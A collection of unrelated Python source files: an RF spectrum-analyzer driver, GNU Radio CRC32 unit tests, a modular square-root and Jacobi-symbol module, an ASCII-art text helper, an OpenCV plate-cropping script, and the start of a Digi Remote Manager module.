self._freq_unit_symbol = 'Hz'
# Add parameters
self.add_parameter('centerfrequency', type=types.FloatType,
flags=Instrument.FLAG_GETSET | Instrument.FLAG_GET_AFTER_SET,
minval=10, maxval=13.6e9,
units='Hz')
self.add_parameter('span', type=types.FloatType,
flags=Instrument.FLAG_GETSET | Instrument.FLAG_GET_AFTER_SET,
minval=0, maxval=13.6e9,
units='Hz')
self.add_parameter('referencelevel', type=types.FloatType,
flags=Instrument.FLAG_GETSET | Instrument.FLAG_GET_AFTER_SET,
minval=-130, maxval=0,
units='dBm', format='%.04e')
self.add_parameter('mode', type=types.StringType,
flags=Instrument.FLAG_GETSET | Instrument.FLAG_GET_AFTER_SET,
format_map = {
"SAN" : "Spectrum",
"IQ" : "IQ Analyzer",
"PNO" : "Phase Noise"
})
self.add_parameter('continuous_sweep', type=types.BooleanType,
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET)
self.add_parameter('sweep_points', type=types.IntType,
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
minval=101, maxval=32001)
self.add_parameter('bandwidth', type=types.FloatType,
flags=Instrument.FLAG_GETSET | Instrument.FLAG_GET_AFTER_SET,
minval=1, maxval=10e6,
units='Hz', format='%d')
def get_instrument(self):
return self._visainstrument
def reset(self):
self._visainstrument.write('*RST')
def markers_to_peaks(self, no_of_peaks=3):
for i in range(8):
self._visainstrument.write('CALC:MARK%d OFF' % (i+1))
for i in range(no_of_peaks):
self._visainstrument.write('CALC:MARK%d ON' % (i+1))
def marker_to_max(self):
self.markers_to_peaks(1)
def set_marker_frequency(self, freq):
self._visainstrument.write('CALC:MARK1:X %dHz' % freq+';*WAI')
def set_markerN_frequency(self,n, freq):
self._visainstrument.write('CALC:MARK%d:X %dHz' %(n, freq))
def marker_next(self, marker=1):
if not int(self._visainstrument.query('CALC:MARK%d?' % (marker)).strip()):
raise FSV_Exception('Marker %d is not on' % (marker))
self._visainstrument.write('CALC:MARK%d:MAX:NEXT' % marker)
def get_max_freqs(self, no_of_peaks=3):
xvals = []
yvals = []
for i in range(no_of_peaks):
if not int(self._visainstrument.query('CALC:MARK%d?' % (i+1)).strip()):
raise FSV_Exception('Marker %d is not on' % (i+1))
xvals.append(float(self._visainstrument.query('CALC:MARK%d:X?' % (i+1)).strip()))
yvals.append(float(self._visainstrument.query('CALC:MARK%d:Y?' % (i+1)).strip()))
return xvals, yvals
# communication with machine
def do_get_centerfrequency(self):
'''
Get center frequency from device
Input:
None
Output:
centerfrequency (float) : center frequency in Hz
'''
logging.debug(__name__ + ' : reading center frequency from instrument')
return float(self._visainstrument.ask('FREQ:CENT?'))
def do_set_centerfrequency(self, centerfrequency):
'''
Set center frequency of device
Input:
centerfrequency (float) : center frequency in Hz
Output:
None
'''
logging.debug(__name__ + ' : setting center frequency to %s Hz' % centerfrequency)
self._visainstrument.write('FREQ:CENT %f' % centerfrequency+';*WAI')
def do_get_span(self):
'''
Get span from device
Input:
None
Output:
span (float) : span in Hz
'''
logging.debug(__name__ + ' : reading span from instrument')
return float(self._visainstrument.ask('FREQ:SPAN?'))
def do_set_span(self,span):
'''
Set span of device
Input:
span (float) : span in Hz
Output:
None
'''
logging.debug(__name__ + ' : setting span to %s Hz' % span)
self._visainstrument.write('FREQ:SPAN %e' % span)
def do_get_referencelevel(self):
'''
Get reference level from device
Input:
None
Output:
referencelevel (float) : reference level in dBm
'''
logging.debug(__name__ + ' : reading referencelevel from instrument')
return float(self._visainstrument.ask('DISP:TRAC:Y:RLEV?'))
def do_set_referencelevel(self,referencelevel):
'''
Set referencelevel of device
Input:
referencelevel (float) : reference level in dBm
Output:
None
'''
logging.debug(__name__ + ' : setting referencelevel to %s dBm' % referencelevel)
self._visainstrument.write('DISP:TRAC:Y:RLEV %e' % referencelevel)
def do_get_mode(self):
'''
Get mode from device
Input:
None
Output:
mode (str) : current instrument mode ("SAN", "IQ" or "PNO")
'''
logging.debug(__name__ + ' : reading mode from instrument')
return self._visainstrument.ask('INST?').strip()
def do_set_mode(self,mode):
'''
Set mode of device
Input:
mode (str) : instrument mode ("SAN", "IQ" or "PNO")
Output:
None
'''
logging.debug(__name__ + ' : setting sweep_mode to %s' % mode)
self._visainstrument.write('INST %s' % mode)
def do_get_continuous_sweep(self):
'''
Get continuous_sweep from device
Input:
None
Output:
continuous_sweep (bool) : whether continuous sweep is enabled
'''
logging.debug(__name__ + ' : reading continuous_sweep from instrument')
return int(self._visainstrument.ask('INIT:CONT?').strip())
def do_set_continuous_sweep(self, continuous_sweep):
'''
Set continuous_sweep of device
Input:
continuous_sweep (bool) : enable (True) or disable (False) continuous sweep
Output:
None
'''
logging.debug(__name__ + ' : setting continuous_sweep to %r' % continuous_sweep)
if continuous_sweep:
string = 'ON'
else:
string = 'OFF'
self._visainstrument.write('INIT:CONT %s' % string)
def do_get_sweep_points(self):
'''
Get sweep_points from device
Input:
None
Output:
sweep_points (int) : number of sweep points
'''
logging.debug(__name__ + ' : reading sweep_points from instrument')
return int(self._visainstrument.ask('SWE:POIN?').strip())
def get_sweep_time(self):
'''
Get the sweep time in Seconds
'''
logging.debug(__name__ + ' : reading sweep_time from instrument')
return float(self._visainstrument.ask('SWE:TIME?').strip())
def do_set_sweep_points(self, sweep_points):
'''
Set sweep_points of device
Input:
sweep_points (int) : number of sweep points
Output:
None
'''
logging.debug(__name__ + ' : setting sweep_points to %d' % sweep_points)
self._visainstrument.write('SWE:POIN %d' % sweep_points)
def do_get_bandwidth(self):
'''
Get bandwidth from device
Input:
None
Output:
bandwidth (float) : resolution bandwidth in Hz
'''
logging.debug(__name__ + ' : reading bandwidth from instrument')
return int(self._visainstrument.ask('BAND?').strip())
def do_set_bandwidth(self, bandwidth):
'''
Set bandwidth of device
Input:
bandwidth (float) : resolution bandwidth in Hz
Output:
None
'''
logging.debug(__name__ + ' : setting bandwidth to %d' % bandwidth)
self._visainstrument.write('BAND %d' % bandwidth)
def wait_till_complete(self):
try:
self._visainstrument.query('*ESR?')
self._visainstrument.write('*OPC')
sweeptime=self.get_sweep_time()*self.get_sweep_count()
qt.msleep(sweeptime-2.)
while int(self._visainstrument.query('*ESR?').strip())%2==0:
qt.msleep(0.1)
except VisaIOError:
print ('FSV timed out. It may be preparing the sweep.\nPress enter to start the sweep.')
raw_input()
self.run_single(wait=True)
except KeyboardInterrupt:
raise Exception('Interrupted in middle of sweep')
def get_data(self):
logging.debug(__name__ + ' : fetching data')
center = self.get_centerfrequency()
span = self.get_span()
npoints = self.get_sweep_points()
#self.run_single(wait=True)
xvals = np.linspace(center-span/2.0, center+span/2.0, npoints)
yvals = self._visainstrument.query('TRAC? TRACE1').split(',')
yvals = map(float,yvals)
return xvals, yvals
def run_single(self, wait=False):
'''
Trigger a single Sweep
'''
self._visainstrument.write('INIT:CONT OFF')
self._visainstrument.write('INIT;*WAI')
if wait:
self.wait_till_complete()
def set_sweep_mode_avg(self, mode = 'LIN'):
logging.debug(__name__ + ' : setting mode to AVG')
self._visainstrument.write('DISP:TRAC:MODE AVER')
self._visainstrument.write('SENS:AVER:TYPE %s'%mode)
def set_sweep_count(self, counts):
logging.debug(__name__ + ' : setting sweep count to %d'%counts)
self._visainstrument.write('SWE:COUN %s'%counts)
def get_sweep_count(self):
# logging.debug(__name__ + ' : setting sweep count to %d'%counts)
return int(self._visainstrument.ask('SWE:COUN?'))
def w(self, string):
return self._visainstrument.write(string)
|
py
|
1a5f198ad80f484ece25738b53539f2a52d81482
|
#!/usr/bin/env python
# Copyright 2012-2014 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest, blocks, digital
import pmt
class qa_crc32_bb(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
self.tsb_key = "length"
def tearDown(self):
self.tb = None
def test_001_crc_len(self):
""" Make sure the output of a CRC set is 4 bytes longer than the input. """
data = range(16)
src = blocks.vector_source_b(data)
crc = digital.crc32_bb(False, self.tsb_key)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(
src,
blocks.stream_to_tagged_stream(gr.sizeof_char, 1,
len(data), self.tsb_key), crc, sink)
self.tb.run()
# Check that the packets before crc_check are 4 bytes longer that the input.
self.assertEqual(len(data) + 4, len(sink.data()[0]))
def test_002_crc_equal(self):
""" Go through CRC set / CRC check and make sure the output
is the same as the input. """
data = (0, 1, 2, 3, 4, 5, 6, 7, 8)
src = blocks.vector_source_b(data)
crc = digital.crc32_bb(False, self.tsb_key)
crc_check = digital.crc32_bb(True, self.tsb_key)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key), crc,
crc_check, sink)
self.tb.run()
# Check that the packets after crc_check are the same as input.
self.assertEqual(data, sink.data()[0])
def test_003_crc_correct_lentag(self):
tag_name = "length"
pack_len = 8
packets = range(pack_len * 2)
tag1 = gr.tag_t()
tag1.offset = 0
tag1.key = pmt.string_to_symbol(tag_name)
tag1.value = pmt.from_long(pack_len)
tag2 = gr.tag_t()
tag2.offset = pack_len
tag2.key = pmt.string_to_symbol(tag_name)
tag2.value = pmt.from_long(pack_len)
testtag1 = gr.tag_t()
testtag1.offset = 1
testtag1.key = pmt.string_to_symbol("tag1")
testtag1.value = pmt.from_long(0)
testtag2 = gr.tag_t()
testtag2.offset = pack_len
testtag2.key = pmt.string_to_symbol("tag2")
testtag2.value = pmt.from_long(0)
testtag3 = gr.tag_t()
testtag3.offset = len(packets) - 1
testtag3.key = pmt.string_to_symbol("tag3")
testtag3.value = pmt.from_long(0)
src = blocks.vector_source_b(packets, False, 1,
(testtag1, testtag2, testtag3))
crc = digital.crc32_bb(False, self.tsb_key)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, pack_len, self.tsb_key), crc,
sink)
self.tb.run()
self.assertEqual(len(sink.data()), 2)
self.assertEqual(len(sink.data()[0]), (pack_len + 4))
self.assertEqual(len(sink.data()[1]), (pack_len + 4))
correct_offsets = {'tag1': 1, 'tag2': 12, 'tag3': 19}
tags_found = {'tag1': False, 'tag2': False, 'tag3': False}
for tag in sink.tags():
key = pmt.symbol_to_string(tag.key)
if key in correct_offsets.keys():
tags_found[key] = True
self.assertEqual(correct_offsets[key], tag.offset)
self.assertTrue(all(tags_found.values()))
def test_004_fail(self):
""" Corrupt the data and make sure it fails CRC test. """
data = (0, 1, 2, 3, 4, 5, 6, 7)
src = blocks.vector_source_b(data)
crc = digital.crc32_bb(False, self.tsb_key)
crc_check = digital.crc32_bb(True, self.tsb_key)
corruptor = blocks.add_const_bb(1)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key), crc,
corruptor, crc_check, sink)
self.tb.run()
# crc_check will drop invalid packets
self.assertEqual(len(sink.data()), 0)
def test_005_tag_propagation(self):
""" Make sure tags on the CRC aren't lost. """
# Data with precalculated CRC
data = (0, 1, 2, 3, 4, 5, 6, 7, 8, 2, 67, 225, 188)
testtag = gr.tag_t()
testtag.offset = len(data) - 1
testtag.key = pmt.string_to_symbol('tag1')
testtag.value = pmt.from_long(0)
src = blocks.vector_source_b(data, False, 1, (testtag, ))
crc_check = digital.crc32_bb(True, self.tsb_key)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key),
crc_check, sink)
self.tb.run()
self.assertEqual([len(data) - 5, ], [
tag.offset for tag in sink.tags()
if pmt.symbol_to_string(tag.key) == 'tag1'
])
# NOTE: What follows are the same tests as before but with the packed flag set to False
def test_006_crc_len(self):
""" Make sure the output of a CRC set is 32 (unpacked) bytes longer than the input. """
data = range(16)
src = blocks.vector_source_b(data)
crc = digital.crc32_bb(False, self.tsb_key, False)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(
src,
blocks.stream_to_tagged_stream(gr.sizeof_char, 1,
len(data), self.tsb_key), crc, sink)
self.tb.run()
# Check that the packets before crc_check are 4 bytes longer that the input.
self.assertEqual(len(data) + 32, len(sink.data()[0]))
def test_007_crc_equal(self):
""" Go through CRC set / CRC check and make sure the output
is the same as the input. """
data = (0, 1, 2, 3, 4, 5, 6, 7, 8)
src = blocks.vector_source_b(data)
crc = digital.crc32_bb(False, self.tsb_key, False)
crc_check = digital.crc32_bb(True, self.tsb_key, False)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key), crc,
crc_check, sink)
self.tb.run()
# Check that the packets after crc_check are the same as input.
self.assertEqual(data, sink.data()[0])
def test_002_crc_equal_unpacked(self):
""" Test unpacked operation with packed operation
"""
data = (0, 1, 2, 3, 4, 5, 6, 7, 8)
src = blocks.vector_source_b(data)
unpack1 = blocks.repack_bits_bb(8, 1, self.tsb_key, False,
gr.GR_LSB_FIRST)
unpack2 = blocks.repack_bits_bb(8, 1, self.tsb_key, False,
gr.GR_LSB_FIRST)
crc_unpacked = digital.crc32_bb(False, self.tsb_key, False)
crc_packed = digital.crc32_bb(False, self.tsb_key, True)
sink1 = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
sink2 = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key),
crc_packed, unpack1, sink1)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key),
unpack2, crc_unpacked, sink2)
self.tb.run()
self.assertEqual(sink1.data(), sink2.data())
def test_003_crc_equal_unpacked(self):
""" Test unpacked operation with packed operation
"""
data = range(35)
src = blocks.vector_source_b(data)
unpack1 = blocks.repack_bits_bb(8, 1, self.tsb_key, False,
gr.GR_LSB_FIRST)
unpack2 = blocks.repack_bits_bb(8, 1, self.tsb_key, False,
gr.GR_LSB_FIRST)
crc_unpacked = digital.crc32_bb(False, self.tsb_key, False)
crc_packed = digital.crc32_bb(False, self.tsb_key, True)
sink1 = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
sink2 = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key),
crc_packed, unpack1, sink1)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key),
unpack2, crc_unpacked, sink2)
self.tb.run()
self.assertEqual(sink1.data(), sink2.data())
def test_008_crc_correct_lentag(self):
tag_name = "length"
pack_len = 8
packets = range(pack_len * 2)
tag1 = gr.tag_t()
tag1.offset = 0
tag1.key = pmt.string_to_symbol(tag_name)
tag1.value = pmt.from_long(pack_len)
tag2 = gr.tag_t()
tag2.offset = pack_len
tag2.key = pmt.string_to_symbol(tag_name)
tag2.value = pmt.from_long(pack_len)
testtag1 = gr.tag_t()
testtag1.offset = 1
testtag1.key = pmt.string_to_symbol("tag1")
testtag1.value = pmt.from_long(0)
testtag2 = gr.tag_t()
testtag2.offset = pack_len
testtag2.key = pmt.string_to_symbol("tag2")
testtag2.value = pmt.from_long(0)
testtag3 = gr.tag_t()
testtag3.offset = len(packets) - 1
testtag3.key = pmt.string_to_symbol("tag3")
testtag3.value = pmt.from_long(0)
src = blocks.vector_source_b(packets, False, 1,
(testtag1, testtag2, testtag3))
crc = digital.crc32_bb(False, self.tsb_key, False)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, pack_len, self.tsb_key), crc,
sink)
self.tb.run()
self.assertEqual(len(sink.data()), 2)
self.assertEqual(len(sink.data()[0]), (pack_len + 32))
self.assertEqual(len(sink.data()[1]), (pack_len + 32))
correct_offsets = {'tag1': 1, 'tag2': 8 + 32, 'tag3': 15 + 32}
tags_found = {'tag1': False, 'tag2': False, 'tag3': False}
for tag in sink.tags():
key = pmt.symbol_to_string(tag.key)
if key in correct_offsets.keys():
tags_found[key] = True
self.assertEqual(correct_offsets[key], tag.offset)
self.assertTrue(all(tags_found.values()))
def test_009_fail(self):
""" Corrupt the data and make sure it fails CRC test. """
data = (0, 1, 2, 3, 4, 5, 6, 7)
src = blocks.vector_source_b(data)
crc = digital.crc32_bb(False, self.tsb_key, False)
crc_check = digital.crc32_bb(True, self.tsb_key, False)
corruptor = blocks.add_const_bb(1)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key), crc,
corruptor, crc_check, sink)
self.tb.run()
# crc_check will drop invalid packets
self.assertEqual(len(sink.data()), 0)
def test_0010_tag_propagation(self):
""" Make sure tags on the CRC aren't lost. """
# Data with precalculated CRC
data = (0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0,
0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0,
1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0,
0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0,
0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1)
testtag = gr.tag_t()
testtag.offset = len(data) - 1
testtag.key = pmt.string_to_symbol('tag1')
testtag.value = pmt.from_long(0)
src = blocks.vector_source_b(data, False, 1, (testtag, ))
crc_check = digital.crc32_bb(True, self.tsb_key, False)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key),
crc_check, sink)
self.tb.run()
self.assertEqual([len(data) - 33, ], [
tag.offset for tag in sink.tags()
if pmt.symbol_to_string(tag.key) == 'tag1'
])
if __name__ == '__main__':
gr_unittest.run(qa_crc32_bb, "qa_crc32_bb.xml")
|
py
|
1a5f198e8d8eee107d0062007fe26a354929ba86
|
import random
from itertools import product
from .common import extract_prime_power
from .modular import solve_crt, invmod
def has_sqrtmod(a, factors=None):
"""
Check if @a is a quadratic residue; the factorization of the modulus is required.
@factors - dict mapping each prime to its power
"""
if not factors:
raise ValueError("Factors can't be empty: %s" % factors)
for p, k in factors.items():
if p <= 1 or k <= 0:
raise ValueError("Not valid prime power: %s**%s" % (p, k))
if not has_sqrtmod_prime_power(a, p, k):
return False
return True
def sqrtmod(a, factors):
"""
Solve x ** 2 = a (mod N), where N is the product of the given prime powers.
Yield all square roots modulo that product.
@factors - dict mapping each prime to its power
"""
coprime_factors = [p ** k for p, k in factors.items()]
sqrts = []
for i, (p, k) in enumerate(factors.items()):
# it's bad that all roots by each modulus are calculated here
# - we can start yielding roots faster
sqrts.append(
list(sqrtmod_prime_power(a % coprime_factors[i], p, k))
)
for rems in product(*sqrts):
yield solve_crt(rems, coprime_factors)
return
def has_sqrtmod_prime_power(a, p, n=1):
"""
Check if @a (mod @p**@n) is quadratic residue, @p is prime.
"""
if p < 2:
raise ValueError("Prime must be greater than 1: " + str(p))
if n < 1:
raise ValueError("Prime power must be positive: " + str(n))
a = a % (p ** n)
if a in (0, 1):
return True
e, a = extract_prime_power(a, p)
if e:
if e & 1:
return False
else:
return has_sqrtmod_prime_power(a, p, n)
if p == 2: # power of 2
return a % 8 == 1
return jacobi(a, p) == 1
def sqrtmod_prime_power(a, p, k=1):
"""
Yield square roots of @a mod @p**@k,
@p - prime
@k >= 1
"""
if k < 1:
raise ValueError("prime power k < 1: %d" % k)
powers = [1]
pow_p = 1
for i in range(k):
pow_p *= p
powers.append(pow_p)
# x**2 == a (mod p), p is prime
def sqrtmod_prime(a, p):
if a == 0:
return (0,)
if a == 1:
return (1, p-1) if p != 2 else (1,)
if jacobi(a, p) == -1:
raise ValueError("No square root for %d (mod %d)" % (a, p))
while True:
b = random.randint(1, p - 1)
if jacobi(b, p) == -1:
break
pow2, t = extract_prime_power(p - 1, 2)
ai = invmod(a, p)
c = pow(b, t, p)
r = pow(a, (t + 1) // 2, p)
for i in range(1, pow2):
e = pow(2, pow2 - i - 1, p - 1)
d = pow(pow(r, 2, p) * ai, e, p)
if d == p - 1:
r = (r * c) % p
c = pow(c, 2, p)
return (r, (-r) % p) # both roots
# x**2 == a (mod p**k), p is prime, gcd(a, p) == 1
def sqrtmod_prime_power_for_coprime(a, p, k):
if a == 1:
if p == 2:
if k == 1:
return (1, )
if k == 2:
return (1, 3)
if k == 3:
return (1, 3, 5, 7)
else:
return 1, pow_p - 1
if p == 2: # roots mod 2**k
roots = 1, 3
powind = 3
while powind < k:
next_powind = powind + 1
next_roots = set()
arem = a % powers[next_powind]
for r in roots: # can be done better
if pow(r, 2, powers[next_powind]) == arem:
next_roots.add(r)
r = powers[powind] - r
if pow(r, 2, powers[next_powind]) == arem:
next_roots.add(r)
powind = next_powind
roots = next_roots
roots = [pow_p - r for r in roots] + list(roots)
return roots
else: # p >= 3
r = sqrtmod_prime(a, p)[0] # any root
powind = 1
while powind < k:
next_powind = min(powind * 2, k)
# Represent root: x = +- (r + p**powind * t1)
b = (a - r**2) % powers[next_powind]
b = (b * invmod(2*r, powers[next_powind])) % powers[next_powind]
if b:
if b % powers[powind]:
raise ValueError("No square root for given value")
b //= powers[powind]
b %= powers[powind]
# Represent t1 = t2 * p**powind + b
# Re-represent root:
# x = +- [ (r + p**powind * b) + t2 * p**(powind*2) ]
r += powers[powind] * b
powind = next_powind
# For next round: x = +- (r + t2 * p**next_powind)
return r % pow_p, (-r) % pow_p
return
# x**2 == 0 (mod p**k), p is prime
def sqrt_for_zero(p, k):
roots = [0]
start_k = (k // 2 + 1) if k & 1 else (k // 2)
r = powers[start_k] % pow_p
r0 = r
while True:
if r: # don't duplicate zero
roots.append(r)
r = (r + powers[start_k]) % pow_p
if r == r0:
break
return roots
# main code
if a == 0:
for r in sqrt_for_zero(p, k):
yield r
return
e, a = extract_prime_power(a, p)
if e & 1:
raise ValueError("No square root for %d (mod %d**%d)" % (a, p, k))
p_acc = powers[e >> 1]
sqrt_k = k - e
roots = sqrtmod_prime_power_for_coprime(a, p, sqrt_k)
if sqrt_k == 0:
for r in roots:
yield (r * p_acc) % pow_p
return
all_roots = set()
for r in roots:
r0 = r % pow_p
while True:
root = (r * p_acc) % pow_p
if root not in all_roots:
yield root
all_roots.add(root)
r = (r + powers[sqrt_k]) % pow_p
if r == r0:
break
return
def jacobi(a, n):
"""
Return Jacobi symbol (or Legendre symbol if n is prime)
"""
s = 1
while True:
if n < 1:
raise ValueError("Too small module for Jacobi symbol: " + str(n))
if n & 1 == 0:
raise ValueError("Jacobi is defined only for odd modules")
if n == 1:
return s
a = a % n
if a == 0:
return 0
if a == 1:
return s
if a & 1 == 0:
if n % 8 in (3, 5):
s = -s
a >>= 1
continue
if a % 4 == 3 and n % 4 == 3:
s = -s
a, n = n, a
return
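# --- Illustrative usage (a minimal sketch, not part of the module) ---
# Square roots of 4 modulo 21 = 3 * 7. The factorization is passed as a dict
# mapping each prime to its power, matching how the functions above iterate
# over factors.items().
#
#   factors = {3: 1, 7: 1}
#   if has_sqrtmod(4, factors):
#       roots = sorted(sqrtmod(4, factors))  # expected: [2, 5, 16, 19]
#   jacobi(4, 21)                            # expected: 1 (4 is a QR mod 21)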
|
py
|
1a5f19a3e24b320ed39cedd9d0035ec8e4954ad6
|
from stringstring.ascii_letters import ascii_letters
def stringstring(string):
base = ''
for i in range(6):
for j in string:
base += ascii_letters[i][j]
base += '\n'
string = string.replace(' ', '')
result = ''
counter = 0
for i in base:
if i == '~':
result += string[counter]
counter += 1
if counter == len(string):
counter = 0
else:
result += i
return result
if __name__ == "__main__":
print(stringstring('Hello World!'))
print(stringstring("This is StringString"))
|
py
|
1a5f1a88f3c0ec9eff4d851fb8731ca2f12a71f4
|
from __future__ import annotations
from pathlib import Path
import cv2 as cv
import numpy as np
from typing import Tuple
SCANNER_PLATE_RADIUS = 1044 // 2
RED_COLOR = (0, 0, 255)
def to_grayscale(image):
return cv.cvtColor(image, cv.COLOR_BGR2GRAY)
def edge_detection(image):
return cv.Canny(image, threshold1=60, threshold2=120)
def blur(size=5):
def apply(image):
return cv.GaussianBlur(image, ksize=(size, size), sigmaX=0)
return apply
def find_circles(image):
return cv.HoughCircles(
image, cv.HOUGH_GRADIENT, dp=1.3, minDist=SCANNER_PLATE_RADIUS * 2 - 50, minRadius=480, maxRadius=540
)
def get_circle_centers(circles):
return circles[0, :, :2].astype(int)
def detect_plate_circles(image):
cropping_pipeline = pipeline(
to_grayscale,
blur(3),
edge_detection,
find_circles,
get_circle_centers,
)
return sorted_plate_centers(cropping_pipeline(image))
def clear_outside_plate(image: np.ndarray) -> np.ndarray:
radius = SCANNER_PLATE_RADIUS
mask = np.zeros_like(image)
cv.circle(mask, (radius, radius), radius, color=(255, 255, 255), thickness=-1)
result = image.copy()
result[mask != 255] = 0
return result
def cut_plate(image: np.ndarray, center: Tuple[int, int]) -> np.ndarray:
x, y = center
radius = SCANNER_PLATE_RADIUS
plate = image[y - radius:y + radius, x - radius:x + radius]
return clear_outside_plate(plate)
def sorted_plate_centers(centers: np.ndarray) -> np.ndarray:
positions = coordinates_to_positions(centers)
result_indices = np.lexsort((positions[:, 0], positions[:, 1]))
return centers[result_indices]
def coordinates_to_positions(centers):
return (centers - centers.min(axis=0) + SCANNER_PLATE_RADIUS) // (SCANNER_PLATE_RADIUS * 2)
def pipeline(*functions):
def call(image):
for function in functions:
image = function(image)
return image
return call
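# --- Illustrative usage (sketch) ---
# pipeline composes the given functions left to right into a single callable,
# which is how detect_plate_circles above builds its cropping_pipeline:
#
#   edges = pipeline(to_grayscale, blur(3), edge_detection)(scanner_image)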
def crop_plates(image, circle_centers):
return [cut_plate(image, center) for center in circle_centers]
def get_combined_shape(circle_centers):
positions = coordinates_to_positions(circle_centers)
columns, rows = positions.max(0) + 1
return rows, columns
def show_detected_plates(image):
centers = detect_plate_circles(image)
draw_plate_circles(image, centers)
return image
def draw_plate_circles(image, centers, *, with_numbers=False):
for i, center in enumerate(centers):
cv.circle(image, tuple(center), radius=SCANNER_PLATE_RADIUS, color=RED_COLOR, thickness=7)
if with_numbers:
cv.putText(image, str(i + 1), tuple(center + (-50, 50)),
fontFace=cv.FONT_HERSHEY_SIMPLEX, fontScale=10, color=RED_COLOR, thickness=14)
def combine_plates(plates, shape):
rows, columns = shape
diameter = SCANNER_PLATE_RADIUS * 2
final_image = np.zeros((rows * diameter, columns * diameter, 3)).astype('uint8')
for i, plate in enumerate(plates):
top = (i // columns) * diameter
left = (i % columns) * diameter
final_image[top: top + diameter, left: left + diameter, :] = plate
return final_image
def save_combined_plates(output_folder, path, combined_image):
cv.imwrite(str(output_folder / f'{path.stem}-cropped{path.suffix}'), combined_image)
def save_separate_plates(output_folder, path, plates):
for i, plate in enumerate(plates):
print(path.stem, i)
cv.imwrite(str(output_folder / f'{path.stem}-{i + 1}{path.suffix}'), plate)
def process_path(path: Path, output_folder: Path, action) -> None:
output_folder.mkdir(parents=True, exist_ok=True)
scanner_image = cv.imread(str(path))
print(f'Processing {path.name}')
plate_centers = detect_plate_circles(scanner_image)
action(output_folder, path, scanner_image, plate_centers)
def _save_separate_plates(output_folder, path, image, centers):
plates = crop_plates(image, centers)
save_separate_plates(output_folder, path, plates)
def _save_combined_plates(output_folder, path, image, centers):
plates = crop_plates(image, centers)
shape = get_combined_shape(centers)
save_combined_plates(output_folder, path, combine_plates(plates, shape))
def _mark_plates(output_folder, path, image, centers):
draw_plate_circles(image, centers)
cv.imwrite(str(output_folder / f'{path.stem}-circles{path.suffix}'), image)
def main() -> None:
for plate in sorted(Path('cropper-hard-cases').glob('*.tif')):
process_path(plate, Path('results/circles'), _mark_plates)
if __name__ == '__main__':
main()
# todo test for number of found plates and for their centers
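# A minimal sketch of such a test, limited to the pure helpers so it needs no
# scanner image; the centers below are made-up example coordinates, not data
# from a real scan.
def test_sorted_plate_centers_orders_row_by_row():
    radius = SCANNER_PLATE_RADIUS
    centers = np.array([
        [3 * radius, radius],   # row 0, column 1
        [radius, radius],       # row 0, column 0
        [radius, 3 * radius],   # row 1, column 0
    ])
    ordered = sorted_plate_centers(centers)
    # Expect row-by-row, left-to-right ordering: indices 1, 0, 2 of the input.
    assert np.array_equal(ordered, centers[[1, 0, 2]])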
|
py
|
1a5f1b21ef5709416a9bc5c3735e9f964dc0e460
|
"""
Copyright (c) 2018, Digi International, Inc.
Module released under MIT License.
Module for easy interface with Digi Remote Manager.
Using documentation from "https://www.digi.com/resources/documentation/digidocs/90001437-13/default.htm#reference/r_ws_v1_streams.htm%3FTocPath%3DWeb%2520services%2520reference%7Cv1%252Fstreams%7C_____0"
